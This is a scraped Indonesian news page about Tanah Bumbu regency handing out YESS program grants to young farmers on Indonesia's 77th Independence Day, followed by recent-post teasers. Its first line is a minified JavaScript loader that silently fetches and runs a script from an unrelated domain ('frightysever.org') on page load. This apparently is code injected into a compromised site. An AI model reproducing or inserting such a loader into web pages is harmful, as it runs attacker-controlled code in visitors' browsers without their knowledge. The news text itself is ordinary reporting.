(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Pemkab Tanbu Serahkan Hibah Kompetitif Program YESS Petani Milenial


KANALKALIMANTAN.COM, BATULICIN – Pemerintah Kabupeten (Pemkab) Tanah Bumbu (Tanbu) melalui Sekretaris Daerah (Sekda) H Ambo Sakka menyerahkan bantuan hibah kompetitif program Youth Enterpreneurship and Employment Support Service (YESS) 2022 kepada para wirausaha milenial bidang pertanian.

Program YESS merupakan program percepatan dari Kementerian Pertanian RI, bekerja sama dengan International Fund for Agricultural Development (IFAD) sejak 2019, guna melahirkan wirausahawan muda di bidang pertanian, serta menghasilkan tenaga kerja yang kompeten di bidang pertanian.

Kementerian Pertanian serius untuk melahirkan wirausaha milenial dari sektor pertanian. Setelah Program Penumbuhan Wirausahawan Muda Pertanian (PWMP), Kementan bersama International Fund for Agricultural Development (IFAD) menciptakan wirausaha milenial tangguh dan berkualitas melalui program YESS.

Bantuan diserahkan usai pelaksanaan Upacara Detik-Detik Proklamasi RI ke-77 di halaman kantor Bupati Tanbu, Rabu (17/8/2022).

 

 

Baca juga: Kabur Bersembunyi 9 Jam, Pelaku Penusukan Maut di Cempaka Ditangkap Polisi

“Hari ini bertepatan dengan peringatan HUT ke-77 Republik Indonesia juga diserahkan bantuan hibah program YESS,” sebut Kepala Badan Perencanaan Pembangunan Daerah Penelitian dan Pengembangan (Bappedalitbang) Tanbu, Andi Anwar Sadat.

Ia mengatakan program YESS merupakan program kerjasama antara Kementan RI dengan IFAD yang dirancang untuk menghasilkan wirausaha muda di bidang pertanian atau petani milenial.

Pada tahun 2022 ini, sambung Anwar Sadat, hibah kompetitif sebanyak 14 wirausaha muda dari ratusan proposal yang masuk dan telah diverifikasi.

Program YESS ini sendiri bertujuan untuk regenerasi petani yang saat ini masih didominasi oleh petani dalam kategori usia sudah tua.

Harapanya melalui program ini dapat meningkatkan kompetensi sumberdaya manusia dari pedesaan yang menekuni bidang pertanian. Sehingga tercipta wirausaha pertanian dari kalangan milenial berdampak pada meningkatnya produksi pertanian di Bumi Bersujud.

Sementara itu, Sekda Tanbu H Ambo Sakka menyampaikan ucapan terima kasih dengan adanya program YESS yang diharapkan menumbuhkan wirausaha-wirausaha muda yang dapat meningkatkan perekonomian masyarakat di Tanah Bumbu. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Risa

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

13 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

13 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

13 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

17 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

20 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

20 jam ago

This website uses cookies.